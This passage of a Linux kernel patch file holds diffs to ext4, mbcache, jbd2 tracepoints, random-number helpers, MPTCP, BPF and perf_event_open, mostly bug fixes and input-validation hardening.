+ 			ext4_msg(sb, KERN_ERR, "can't mount with "
+-				 "journal_async_commit, fs mounted w/o journal");
++				 "journal_checksum, fs mounted w/o journal");
+ 			goto failed_mount3a;
+ 		}
+ 		if (sbi->s_commit_interval != JBD2_DEFAULT_MAX_COMMIT_AGE*HZ) {
+@@ -5723,7 +5725,7 @@ static struct inode *ext4_get_journal_inode(struct super_block *sb,
+ 
+ 	ext4_debug("Journal inode found at %p: %lld bytes\n",
+ 		  journal_inode, journal_inode->i_size);
+-	if (!S_ISREG(journal_inode->i_mode)) {
++	if (!S_ISREG(journal_inode->i_mode) || IS_ENCRYPTED(journal_inode)) {
+ 		ext4_msg(sb, KERN_ERR, "invalid journal inode");
+ 		iput(journal_inode);
+ 		return NULL;
+@@ -6886,6 +6888,20 @@ static int ext4_quota_on(struct super_block *sb, int type, int format_id,
+ 	return err;
+ }
+ 
++static inline bool ext4_check_quota_inum(int type, unsigned long qf_inum)
++{
++	switch (type) {
++	case USRQUOTA:
++		return qf_inum == EXT4_USR_QUOTA_INO;
++	case GRPQUOTA:
++		return qf_inum == EXT4_GRP_QUOTA_INO;
++	case PRJQUOTA:
++		return qf_inum >= EXT4_GOOD_OLD_FIRST_INO;
++	default:
++		BUG();
++	}
++}
++
+ static int ext4_quota_enable(struct super_block *sb, int type, int format_id,
+ 			     unsigned int flags)
+ {
+@@ -6902,9 +6918,16 @@ static int ext4_quota_enable(struct super_block *sb, int type, int format_id,
+ 	if (!qf_inums[type])
+ 		return -EPERM;
+ 
++	if (!ext4_check_quota_inum(type, qf_inums[type])) {
++		ext4_error(sb, "Bad quota inum: %lu, type: %d",
++				qf_inums[type], type);
++		return -EUCLEAN;
++	}
++
+ 	qf_inode = ext4_iget(sb, qf_inums[type], EXT4_IGET_SPECIAL);
+ 	if (IS_ERR(qf_inode)) {
+-		ext4_error(sb, "Bad quota inode # %lu", qf_inums[type]);
++		ext4_error(sb, "Bad quota inode: %lu, type: %d",
++				qf_inums[type], type);
+ 		return PTR_ERR(qf_inode);
+ 	}
+ 
+@@ -6943,8 +6966,9 @@ int ext4_enable_quotas(struct super_block *sb)
+ 			if (err) {
+ 				ext4_warning(sb,
+ 					"Failed to enable quota tracking "
+-					"(type=%d, err=%d). Please run "
+-					"e2fsck to fix.", type, err);
++					"(type=%d, err=%d, ino=%lu). "
++					"Please run e2fsck to fix.", type,
++					err, qf_inums[type]);
+ 				for (type--; type >= 0; type--) {
+ 					struct inode *inode;
+ 
+diff --git a/fs/ext4/verity.c b/fs/ext4/verity.c
+index 3c640bd7ecaeb..30e3b65798b50 100644
+--- a/fs/ext4/verity.c
++++ b/fs/ext4/verity.c
+@@ -79,7 +79,7 @@ static int pagecache_write(struct inode *inode, const void *buf, size_t count,
+ 		size_t n = min_t(size_t, count,
+ 				 PAGE_SIZE - offset_in_page(pos));
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		int res;
+ 
+ 		res = aops->write_begin(NULL, mapping, pos, n, &page, &fsdata);
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 36d6ba7190b6d..866772a2e068f 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1281,7 +1281,7 @@ retry_ref:
+ 				ce = mb_cache_entry_get(ea_block_cache, hash,
+ 							bh->b_blocknr);
+ 				if (ce) {
+-					ce->e_reusable = 1;
++					set_bit(MBE_REUSABLE_B, &ce->e_flags);
+ 					mb_cache_entry_put(ea_block_cache, ce);
+ 				}
+ 			}
+@@ -1441,6 +1441,9 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
+ 		if (!err)
+ 			err = ext4_inode_attach_jinode(ea_inode);
+ 		if (err) {
++			if (ext4_xattr_inode_dec_ref(handle, ea_inode))
++				ext4_warning_inode(ea_inode,
++					"cleanup dec ref error %d", err);
+ 			iput(ea_inode);
+ 			return ERR_PTR(err);
+ 		}
+@@ -2042,7 +2045,7 @@ inserted:
+ 				}
+ 				BHDR(new_bh)->h_refcount = cpu_to_le32(ref);
+ 				if (ref == EXT4_XATTR_REFCOUNT_MAX)
+-					ce->e_reusable = 0;
++					clear_bit(MBE_REUSABLE_B, &ce->e_flags);
+ 				ea_bdebug(new_bh, "reusing; refcount now=%d",
+ 					  ref);
+ 				ext4_xattr_block_csum_set(inode, new_bh);
+@@ -2070,19 +2073,11 @@ inserted:
+ 
+ 			goal = ext4_group_first_block_no(sb,
+ 						EXT4_I(inode)->i_block_group);
+-
+-			/* non-extent files can't have physical blocks past 2^32 */
+-			if (!(ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS)))
+-				goal = goal & EXT4_MAX_BLOCK_FILE_PHYS;
+-
+ 			block = ext4_new_meta_blocks(handle, inode, goal, 0,
+ 						     NULL, &error);
+ 			if (error)
+ 				goto cleanup;
+ 
+-			if (!(ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS)))
+-				BUG_ON(block > EXT4_MAX_BLOCK_FILE_PHYS);
+-
+ 			ea_idebug(inode, "creating block %llu",
+ 				  (unsigned long long)block);
+ 
+@@ -2555,7 +2550,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+ 	bs = kzalloc(sizeof(struct ext4_xattr_block_find), GFP_NOFS);
+-	buffer = kmalloc(value_size, GFP_NOFS);
++	buffer = kvmalloc(value_size, GFP_NOFS);
+ 	b_entry_name = kmalloc(entry->e_name_len + 1, GFP_NOFS);
+ 	if (!is || !bs || !buffer || !b_entry_name) {
+ 		error = -ENOMEM;
+@@ -2607,7 +2602,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 	error = 0;
+ out:
+ 	kfree(b_entry_name);
+-	kfree(buffer);
++	kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+ 	if (bs)
+diff --git a/fs/fs_parser.c b/fs/fs_parser.c
+index ed40ce5742fda..edb3712dcfa58 100644
+--- a/fs/fs_parser.c
++++ b/fs/fs_parser.c
+@@ -138,15 +138,16 @@ EXPORT_SYMBOL(__fs_parse);
+  * @fc: The filesystem context to log errors through.
+  * @param: The parameter.
+  * @want_bdev: T if want a blockdev
++ * @flags: Pathwalk flags passed to filename_lookup()
+  * @_path: The result of the lookup
+  */
+ int fs_lookup_param(struct fs_context *fc,
+ 		    struct fs_parameter *param,
+ 		    bool want_bdev,
++		    unsigned int flags,
+ 		    struct path *_path)
+ {
+ 	struct filename *f;
+-	unsigned int flags = 0;
+ 	bool put_f;
+ 	int ret;
+ 
+diff --git a/fs/mbcache.c b/fs/mbcache.c
+index e272ad738faff..2a4b8b549e934 100644
+--- a/fs/mbcache.c
++++ b/fs/mbcache.c
+@@ -100,8 +100,9 @@ int mb_cache_entry_create(struct mb_cache *cache, gfp_t mask, u32 key,
+ 	atomic_set(&entry->e_refcnt, 2);
+ 	entry->e_key = key;
+ 	entry->e_value = value;
+-	entry->e_reusable = reusable;
+-	entry->e_referenced = 0;
++	entry->e_flags = 0;
++	if (reusable)
++		set_bit(MBE_REUSABLE_B, &entry->e_flags);
+ 	head = mb_cache_entry_head(cache, key);
+ 	hlist_bl_lock(head);
+ 	hlist_bl_for_each_entry(dup, dup_node, head, e_hash_list) {
+@@ -165,7 +166,8 @@ static struct mb_cache_entry *__entry_find(struct mb_cache *cache,
+ 	while (node) {
+ 		entry = hlist_bl_entry(node, struct mb_cache_entry,
+ 				       e_hash_list);
+-		if (entry->e_key == key && entry->e_reusable &&
++		if (entry->e_key == key &&
++		    test_bit(MBE_REUSABLE_B, &entry->e_flags) &&
+ 		    atomic_inc_not_zero(&entry->e_refcnt))
+ 			goto out;
+ 		node = node->next;
+@@ -284,7 +286,7 @@ EXPORT_SYMBOL(mb_cache_entry_delete_or_get);
+ void mb_cache_entry_touch(struct mb_cache *cache,
+ 			  struct mb_cache_entry *entry)
+ {
+-	entry->e_referenced = 1;
++	set_bit(MBE_REFERENCED_B, &entry->e_flags);
+ }
+ EXPORT_SYMBOL(mb_cache_entry_touch);
+ 
+@@ -309,9 +311,9 @@ static unsigned long mb_cache_shrink(struct mb_cache *cache,
+ 		entry = list_first_entry(&cache->c_list,
+ 					 struct mb_cache_entry, e_list);
+ 		/* Drop initial hash reference if there is no user */
+-		if (entry->e_referenced ||
++		if (test_bit(MBE_REFERENCED_B, &entry->e_flags) ||
+ 		    atomic_cmpxchg(&entry->e_refcnt, 1, 0) != 1) {
+-			entry->e_referenced = 0;
++			clear_bit(MBE_REFERENCED_B, &entry->e_flags);
+ 			list_move_tail(&entry->e_list, &cache->c_list);
+ 			continue;
+ 		}
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index 0427b44bfee54..f27faf5db5544 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -2324,6 +2324,8 @@ static int vfs_setup_quota_inode(struct inode *inode, int type)
+ 	struct super_block *sb = inode->i_sb;
+ 	struct quota_info *dqopt = sb_dqopt(sb);
+ 
++	if (is_bad_inode(inode))
++		return -EUCLEAN;
+ 	if (!S_ISREG(inode->i_mode))
+ 		return -EACCES;
+ 	if (IS_RDONLY(inode))
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index 9e1e6965f4074..0eb8f035b3d9f 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -642,7 +642,7 @@ static inline u32 type_flag(u32 type)
+ }
+ 
+ /* only use after check_attach_btf_id() */
+-static inline enum bpf_prog_type resolve_prog_type(struct bpf_prog *prog)
++static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ {
+ 	return prog->type == BPF_PROG_TYPE_EXT ?
+ 		prog->aux->dst_prog->type : prog->type;
+diff --git a/include/linux/devfreq.h b/include/linux/devfreq.h
+index 34aab4dd336c8..4dc7cda4fd469 100644
+--- a/include/linux/devfreq.h
++++ b/include/linux/devfreq.h
+@@ -152,8 +152,8 @@ struct devfreq_stats {
+  * @max_state:		count of entry present in the frequency table.
+  * @previous_freq:	previously configured frequency value.
+  * @last_status:	devfreq user device info, performance statistics
+- * @data:	Private data of the governor. The devfreq framework does not
+- *		touch this.
++ * @data:	devfreq driver pass to governors, governor should not change it.
++ * @governor_data:	private data for governors, devfreq core doesn't touch it.
+  * @user_min_freq_req:	PM QoS minimum frequency request from user (via sysfs)
+  * @user_max_freq_req:	PM QoS maximum frequency request from user (via sysfs)
+  * @scaling_min_freq:	Limit minimum frequency requested by OPP interface
+@@ -193,7 +193,8 @@ struct devfreq {
+ 	unsigned long previous_freq;
+ 	struct devfreq_dev_status last_status;
+ 
+-	void *data; /* private data for governors */
++	void *data;
++	void *governor_data;
+ 
+ 	struct dev_pm_qos_request user_min_freq_req;
+ 	struct dev_pm_qos_request user_max_freq_req;
+diff --git a/include/linux/fs_parser.h b/include/linux/fs_parser.h
+index f103c91139d4a..01542c4b87a2b 100644
+--- a/include/linux/fs_parser.h
++++ b/include/linux/fs_parser.h
+@@ -76,6 +76,7 @@ static inline int fs_parse(struct fs_context *fc,
+ extern int fs_lookup_param(struct fs_context *fc,
+ 			   struct fs_parameter *param,
+ 			   bool want_bdev,
++			   unsigned int flags,
+ 			   struct path *_path);
+ 
+ extern int lookup_constant(const struct constant_table tbl[], const char *name, int not_found);
+diff --git a/include/linux/mbcache.h b/include/linux/mbcache.h
+index 2da63fd7b98f4..97e64184767de 100644
+--- a/include/linux/mbcache.h
++++ b/include/linux/mbcache.h
+@@ -10,6 +10,12 @@
+ 
+ struct mb_cache;
+ 
++/* Cache entry flags */
++enum {
++	MBE_REFERENCED_B = 0,
++	MBE_REUSABLE_B
++};
++
+ struct mb_cache_entry {
+ 	/* List of entries in cache - protected by cache->c_list_lock */
+ 	struct list_head	e_list;
+@@ -26,8 +32,7 @@ struct mb_cache_entry {
+ 	atomic_t		e_refcnt;
+ 	/* Key in hash - stable during lifetime of the entry */
+ 	u32			e_key;
+-	u32			e_referenced:1;
+-	u32			e_reusable:1;
++	unsigned long		e_flags;
+ 	/* User provided value - stable during lifetime of the entry */
+ 	u64			e_value;
+ };
+diff --git a/include/linux/prandom.h b/include/linux/prandom.h
+index e0a0759dd09c0..1f4a0de7b019e 100644
+--- a/include/linux/prandom.h
++++ b/include/linux/prandom.h
+@@ -23,24 +23,10 @@ void prandom_seed_full_state(struct rnd_state __percpu *pcpu_state);
+ #define prandom_init_once(pcpu_state)			\
+ 	DO_ONCE(prandom_seed_full_state, (pcpu_state))
+ 
+-/**
+- * prandom_u32_max - returns a pseudo-random number in interval [0, ep_ro)
+- * @ep_ro: right open interval endpoint
+- *
+- * Returns a pseudo-random number that is in interval [0, ep_ro). This is
+- * useful when requesting a random index of an array containing ep_ro elements,
+- * for example. The result is somewhat biased when ep_ro is not a power of 2,
+- * so do not use this for cryptographic purposes.
+- *
+- * Returns: pseudo-random number in interval [0, ep_ro)
+- */
++/* Deprecated: use get_random_u32_below() instead. */
+ static inline u32 prandom_u32_max(u32 ep_ro)
+ {
+-	if (__builtin_constant_p(ep_ro <= 1U << 8) && ep_ro <= 1U << 8)
+-		return (get_random_u8() * ep_ro) >> 8;
+-	if (__builtin_constant_p(ep_ro <= 1U << 16) && ep_ro <= 1U << 16)
+-		return (get_random_u16() * ep_ro) >> 16;
+-	return ((u64)get_random_u32() * ep_ro) >> 32;
++	return get_random_u32_below(ep_ro);
+ }
+ 
+ /*
+diff --git a/include/linux/random.h b/include/linux/random.h
+index 147a5e0d0b8ed..bd954ecbef901 100644
+--- a/include/linux/random.h
++++ b/include/linux/random.h
+@@ -51,6 +51,71 @@ static inline unsigned long get_random_long(void)
+ #endif
+ }
+ 
++u32 __get_random_u32_below(u32 ceil);
++
++/*
++ * Returns a random integer in the interval [0, ceil), with uniform
++ * distribution, suitable for all uses. Fastest when ceil is a constant, but
++ * still fast for variable ceil as well.
++ */
++static inline u32 get_random_u32_below(u32 ceil)
++{
++	if (!__builtin_constant_p(ceil))
++		return __get_random_u32_below(ceil);
++
++	/*
++	 * For the fast path, below, all operations on ceil are precomputed by
++	 * the compiler, so this incurs no overhead for checking pow2, doing
++	 * divisions, or branching based on integer size. The resultant
++	 * algorithm does traditional reciprocal multiplication (typically
++	 * optimized by the compiler into shifts and adds), rejecting samples
++	 * whose lower half would indicate a range indivisible by ceil.
++	 */
++	BUILD_BUG_ON_MSG(!ceil, "get_random_u32_below() must take ceil > 0");
++	if (ceil <= 1)
++		return 0;
++	for (;;) {
++		if (ceil <= 1U << 8) {
++			u32 mult = ceil * get_random_u8();
++			if (likely(is_power_of_2(ceil) || (u8)mult >= (1U << 8) % ceil))
++				return mult >> 8;
++		} else if (ceil <= 1U << 16) {
++			u32 mult = ceil * get_random_u16();
++			if (likely(is_power_of_2(ceil) || (u16)mult >= (1U << 16) % ceil))
++				return mult >> 16;
++		} else {
++			u64 mult = (u64)ceil * get_random_u32();
++			if (likely(is_power_of_2(ceil) || (u32)mult >= -ceil % ceil))
++				return mult >> 32;
++		}
++	}
++}
++
++/*
++ * Returns a random integer in the interval (floor, U32_MAX], with uniform
++ * distribution, suitable for all uses. Fastest when floor is a constant, but
++ * still fast for variable floor as well.
++ */
++static inline u32 get_random_u32_above(u32 floor)
++{
++	BUILD_BUG_ON_MSG(__builtin_constant_p(floor) && floor == U32_MAX,
++			 "get_random_u32_above() must take floor < U32_MAX");
++	return floor + 1 + get_random_u32_below(U32_MAX - floor);
++}
++
++/*
++ * Returns a random integer in the interval [floor, ceil], with uniform
++ * distribution, suitable for all uses. Fastest when floor and ceil are
++ * constant, but still fast for variable floor and ceil as well.
++ */
++static inline u32 get_random_u32_inclusive(u32 floor, u32 ceil)
++{
++	BUILD_BUG_ON_MSG(__builtin_constant_p(floor) && __builtin_constant_p(ceil) &&
++			 (floor > ceil || ceil - floor == U32_MAX),
++			 "get_random_u32_inclusive() must take floor <= ceil");
++	return floor + get_random_u32_below(ceil - floor + 1);
++}
++
+ /*
+  * On 64-bit architectures, protect against non-terminated C string overflows
+  * by zeroing out the first byte of the canary; this leaves 56 bits of entropy.
+diff --git a/include/net/mptcp.h b/include/net/mptcp.h
+index 412479ebf5ad3..3c5c68618fcc5 100644
+--- a/include/net/mptcp.h
++++ b/include/net/mptcp.h
+@@ -97,8 +97,6 @@ struct mptcp_out_options {
+ };
+ 
+ #ifdef CONFIG_MPTCP
+-extern struct request_sock_ops mptcp_subflow_request_sock_ops;
+-
+ void mptcp_init(void);
+ 
+ static inline bool sk_is_mptcp(const struct sock *sk)
+@@ -188,6 +186,9 @@ void mptcp_seq_show(struct seq_file *seq);
+ int mptcp_subflow_init_cookie_req(struct request_sock *req,
+ 				  const struct sock *sk_listener,
+ 				  struct sk_buff *skb);
++struct request_sock *mptcp_subflow_reqsk_alloc(const struct request_sock_ops *ops,
++					       struct sock *sk_listener,
++					       bool attach_listener);
+ 
+ __be32 mptcp_get_reset_option(const struct sk_buff *skb);
+ 
+@@ -274,6 +275,13 @@ static inline int mptcp_subflow_init_cookie_req(struct request_sock *req,
+ 	return 0; /* TCP fallback */
+ }
+ 
++static inline struct request_sock *mptcp_subflow_reqsk_alloc(const struct request_sock_ops *ops,
++							     struct sock *sk_listener,
++							     bool attach_listener)
++{
++	return NULL;
++}
++
+ static inline __be32 mptcp_reset_option(const struct sk_buff *skb)  { return htonl(0u); }
+ #endif /* CONFIG_MPTCP */
+ 
+diff --git a/include/trace/events/ext4.h b/include/trace/events/ext4.h
+index 229e8fae66a34..ced95fec3367d 100644
+--- a/include/trace/events/ext4.h
++++ b/include/trace/events/ext4.h
+@@ -104,6 +104,7 @@ TRACE_DEFINE_ENUM(EXT4_FC_REASON_RESIZE);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_RENAME_DIR);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_FALLOC_RANGE);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_INODE_JOURNAL_DATA);
++TRACE_DEFINE_ENUM(EXT4_FC_REASON_ENCRYPTED_FILENAME);
+ TRACE_DEFINE_ENUM(EXT4_FC_REASON_MAX);
+ 
+ #define show_fc_reason(reason)						\
+@@ -116,7 +117,8 @@ TRACE_DEFINE_ENUM(EXT4_FC_REASON_MAX);
+ 		{ EXT4_FC_REASON_RESIZE,	"RESIZE"},		\
+ 		{ EXT4_FC_REASON_RENAME_DIR,	"RENAME_DIR"},		\
+ 		{ EXT4_FC_REASON_FALLOC_RANGE,	"FALLOC_RANGE"},	\
+-		{ EXT4_FC_REASON_INODE_JOURNAL_DATA,	"INODE_JOURNAL_DATA"})
++		{ EXT4_FC_REASON_INODE_JOURNAL_DATA,	"INODE_JOURNAL_DATA"}, \
++		{ EXT4_FC_REASON_ENCRYPTED_FILENAME,	"ENCRYPTED_FILENAME"})
+ 
+ TRACE_EVENT(ext4_other_inode_update_time,
+ 	TP_PROTO(struct inode *inode, ino_t orig_ino),
+@@ -2764,7 +2766,7 @@ TRACE_EVENT(ext4_fc_stats,
+ 	),
+ 
+ 	TP_printk("dev %d,%d fc ineligible reasons:\n"
+-		  "%s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u "
++		  "%s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u, %s:%u"
+ 		  "num_commits:%lu, ineligible: %lu, numblks: %lu",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_XATTR),
+@@ -2776,6 +2778,7 @@ TRACE_EVENT(ext4_fc_stats,
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_RENAME_DIR),
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_FALLOC_RANGE),
+ 		  FC_REASON_NAME_STAT(EXT4_FC_REASON_INODE_JOURNAL_DATA),
++		  FC_REASON_NAME_STAT(EXT4_FC_REASON_ENCRYPTED_FILENAME),
+ 		  __entry->fc_commits, __entry->fc_ineligible_commits,
+ 		  __entry->fc_numblks)
+ );
+diff --git a/include/trace/events/jbd2.h b/include/trace/events/jbd2.h
+index 99f783c384bb4..8f5ee380d3093 100644
+--- a/include/trace/events/jbd2.h
++++ b/include/trace/events/jbd2.h
+@@ -40,7 +40,7 @@ DECLARE_EVENT_CLASS(jbd2_commit,
+ 	TP_STRUCT__entry(
+ 		__field(	dev_t,	dev			)
+ 		__field(	char,	sync_commit		  )
+-		__field(	int,	transaction		  )
++		__field(	tid_t,	transaction		  )
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -49,7 +49,7 @@ DECLARE_EVENT_CLASS(jbd2_commit,
+ 		__entry->transaction	= commit_transaction->t_tid;
+ 	),
+ 
+-	TP_printk("dev %d,%d transaction %d sync %d",
++	TP_printk("dev %d,%d transaction %u sync %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  __entry->transaction, __entry->sync_commit)
+ );
+@@ -97,8 +97,8 @@ TRACE_EVENT(jbd2_end_commit,
+ 	TP_STRUCT__entry(
+ 		__field(	dev_t,	dev			)
+ 		__field(	char,	sync_commit		  )
+-		__field(	int,	transaction		  )
+-		__field(	int,	head		  	  )
++		__field(	tid_t,	transaction		  )
++		__field(	tid_t,	head		  	  )
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -108,7 +108,7 @@ TRACE_EVENT(jbd2_end_commit,
+ 		__entry->head		= journal->j_tail_sequence;
+ 	),
+ 
+-	TP_printk("dev %d,%d transaction %d sync %d head %d",
++	TP_printk("dev %d,%d transaction %u sync %d head %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev),
+ 		  __entry->transaction, __entry->sync_commit, __entry->head)
+ );
+@@ -134,14 +134,14 @@ TRACE_EVENT(jbd2_submit_inode_data,
+ );
+ 
+ DECLARE_EVENT_CLASS(jbd2_handle_start_class,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int requested_blocks),
+ 
+ 	TP_ARGS(dev, tid, type, line_no, requested_blocks),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	 unsigned int,	type		)
+ 		__field(	 unsigned int,	line_no		)
+ 		__field(		  int,	requested_blocks)
+@@ -155,28 +155,28 @@ DECLARE_EVENT_CLASS(jbd2_handle_start_class,
+ 		__entry->requested_blocks = requested_blocks;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu type %u line_no %u "
++	TP_printk("dev %d,%d tid %u type %u line_no %u "
+ 		  "requested_blocks %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  __entry->type, __entry->line_no, __entry->requested_blocks)
+ );
+ 
+ DEFINE_EVENT(jbd2_handle_start_class, jbd2_handle_start,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int requested_blocks),
+ 
+ 	TP_ARGS(dev, tid, type, line_no, requested_blocks)
+ );
+ 
+ DEFINE_EVENT(jbd2_handle_start_class, jbd2_handle_restart,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int requested_blocks),
+ 
+ 	TP_ARGS(dev, tid, type, line_no, requested_blocks)
+ );
+ 
+ TRACE_EVENT(jbd2_handle_extend,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int buffer_credits,
+ 		 int requested_blocks),
+ 
+@@ -184,7 +184,7 @@ TRACE_EVENT(jbd2_handle_extend,
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	 unsigned int,	type		)
+ 		__field(	 unsigned int,	line_no		)
+ 		__field(		  int,	buffer_credits  )
+@@ -200,7 +200,7 @@ TRACE_EVENT(jbd2_handle_extend,
+ 		__entry->requested_blocks = requested_blocks;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu type %u line_no %u "
++	TP_printk("dev %d,%d tid %u type %u line_no %u "
+ 		  "buffer_credits %d requested_blocks %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  __entry->type, __entry->line_no, __entry->buffer_credits,
+@@ -208,7 +208,7 @@ TRACE_EVENT(jbd2_handle_extend,
+ );
+ 
+ TRACE_EVENT(jbd2_handle_stats,
+-	TP_PROTO(dev_t dev, unsigned long tid, unsigned int type,
++	TP_PROTO(dev_t dev, tid_t tid, unsigned int type,
+ 		 unsigned int line_no, int interval, int sync,
+ 		 int requested_blocks, int dirtied_blocks),
+ 
+@@ -217,7 +217,7 @@ TRACE_EVENT(jbd2_handle_stats,
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	 unsigned int,	type		)
+ 		__field(	 unsigned int,	line_no		)
+ 		__field(		  int,	interval	)
+@@ -237,7 +237,7 @@ TRACE_EVENT(jbd2_handle_stats,
+ 		__entry->dirtied_blocks	  = dirtied_blocks;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu type %u line_no %u interval %d "
++	TP_printk("dev %d,%d tid %u type %u line_no %u interval %d "
+ 		  "sync %d requested_blocks %d dirtied_blocks %d",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  __entry->type, __entry->line_no, __entry->interval,
+@@ -246,14 +246,14 @@ TRACE_EVENT(jbd2_handle_stats,
+ );
+ 
+ TRACE_EVENT(jbd2_run_stats,
+-	TP_PROTO(dev_t dev, unsigned long tid,
++	TP_PROTO(dev_t dev, tid_t tid,
+ 		 struct transaction_run_stats_s *stats),
+ 
+ 	TP_ARGS(dev, tid, stats),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	unsigned long,	wait		)
+ 		__field(	unsigned long,	request_delay	)
+ 		__field(	unsigned long,	running		)
+@@ -279,7 +279,7 @@ TRACE_EVENT(jbd2_run_stats,
+ 		__entry->blocks_logged	= stats->rs_blocks_logged;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu wait %u request_delay %u running %u "
++	TP_printk("dev %d,%d tid %u wait %u request_delay %u running %u "
+ 		  "locked %u flushing %u logging %u handle_count %u "
+ 		  "blocks %u blocks_logged %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+@@ -294,14 +294,14 @@ TRACE_EVENT(jbd2_run_stats,
+ );
+ 
+ TRACE_EVENT(jbd2_checkpoint_stats,
+-	TP_PROTO(dev_t dev, unsigned long tid,
++	TP_PROTO(dev_t dev, tid_t tid,
+ 		 struct transaction_chp_stats_s *stats),
+ 
+ 	TP_ARGS(dev, tid, stats),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(		dev_t,	dev		)
+-		__field(	unsigned long,	tid		)
++		__field(		tid_t,	tid		)
+ 		__field(	unsigned long,	chp_time	)
+ 		__field(		__u32,	forced_to_close	)
+ 		__field(		__u32,	written		)
+@@ -317,7 +317,7 @@ TRACE_EVENT(jbd2_checkpoint_stats,
+ 		__entry->dropped	= stats->cs_dropped;
+ 	),
+ 
+-	TP_printk("dev %d,%d tid %lu chp_time %u forced_to_close %u "
++	TP_printk("dev %d,%d tid %u chp_time %u forced_to_close %u "
+ 		  "written %u dropped %u",
+ 		  MAJOR(__entry->dev), MINOR(__entry->dev), __entry->tid,
+ 		  jiffies_to_msecs(__entry->chp_time),
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 25a54e04560e5..17ab3e15ac25f 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -2088,6 +2088,7 @@ static unsigned int __bpf_prog_ret0_warn(const void *ctx,
+ bool bpf_prog_map_compatible(struct bpf_map *map,
+ 			     const struct bpf_prog *fp)
+ {
++	enum bpf_prog_type prog_type = resolve_prog_type(fp);
+ 	bool ret;
+ 
+ 	if (fp->kprobe_override)
+@@ -2098,12 +2099,12 @@ bool bpf_prog_map_compatible(struct bpf_map *map,
+ 		/* There's no owner yet where we could check for
+ 		 * compatibility.
+ 		 */
+-		map->owner.type  = fp->type;
++		map->owner.type  = prog_type;
+ 		map->owner.jited = fp->jited;
+ 		map->owner.xdp_has_frags = fp->aux->xdp_has_frags;
+ 		ret = true;
+ 	} else {
+-		ret = map->owner.type  == fp->type &&
++		ret = map->owner.type  == prog_type &&
+ 		      map->owner.jited == fp->jited &&
+ 		      map->owner.xdp_has_frags == fp->aux->xdp_has_frags;
+ 	}
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 732b392fc5c63..3b9e86108f435 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -12231,12 +12231,12 @@ SYSCALL_DEFINE5(perf_event_open,
+ 	if (flags & ~PERF_FLAG_ALL)
+ 		return -EINVAL;
+ 
+-	/* Do we allow access to perf_event_open(2) ? */
+-	err = security_perf_event_open(&attr, PERF_SECURITY_OPEN);
++	err = perf_copy_attr(attr_uptr, &attr);
+ 	if (err)
+ 		return err;
+ 
+-	err = perf_copy_attr(attr_uptr, &attr);
++	/* Do we allow access to perf_event_open(2) ? */
